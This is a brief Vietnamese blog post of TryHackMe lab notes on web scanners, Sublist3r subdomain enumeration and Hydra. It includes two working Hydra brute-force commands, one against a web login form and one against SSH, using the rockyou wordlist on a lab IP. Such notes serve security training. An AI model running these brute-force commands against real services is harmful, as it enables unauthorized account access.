This page looks best with JavaScript enabled

Web Scanning, Sublist3r, Hydra - TryHackMe

 ·  ☕ 1 min read  ·  🤖 ch1nhpd
    🏷️

Hai cái tool là NiktoZap.
Cả hai đều sử dụng để tìm kiểm những điểm yếu trang web.

Sublist3r: tìm ra các subdomain dựa vào các công cụ tìm kiếm như bing, gg, baidu,…
Ngoài ra có một trang web để làm công việc tương tự

Hydra
Là một cái tool để brute force password một số dịch vụ như ftp,ssh,webapp form,…

VD1: web app form
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.229.24 http-post-form "/login:username=^USER^&password=^PASS^:Your username or password is incorrect." -V

VD2: ssh
hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.229.24 -t 4 ssh

Share on

Phạm Đăng Chính
WRITTEN BY
ch1nhpd
Developer, Pentester